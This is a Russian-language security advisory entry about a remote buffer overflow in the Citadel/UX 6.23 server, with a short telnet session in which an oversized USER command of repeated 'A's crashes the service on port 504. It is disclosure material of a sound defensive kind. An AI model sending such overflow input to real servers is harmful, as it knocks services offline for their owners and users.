Дата публикации: | 01.08.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1214 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Citadel/UX 6.23 и более ранние версии
Описание: Уязвимость в Citadel/UX позволяет удаленному пользователю аварийно завершить работу приложения. Удаленный пользователь может подключиться к целевой системе на 504 порту и послать USER команду с более 97 байтами, чтобы вызвать переполнение буфера и аварийно завершить работу сервера. Уязвимость позволяет перезаписать EIP регистр данными пользователя, однако данные пользователя преобразуются к нижнему регистру перед переполнением. Пример: coki@servidor:~$ telnet localhost 504 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 200 servidor Citadel/UX server ready. USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA Connection closed by foreign host. coki@servidor:~$ Пример/Эксплоит: См. Источник сообщения. URL производителя:http://www.citadel.org/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | No System Group - Advisory #04 - 28/07/04 |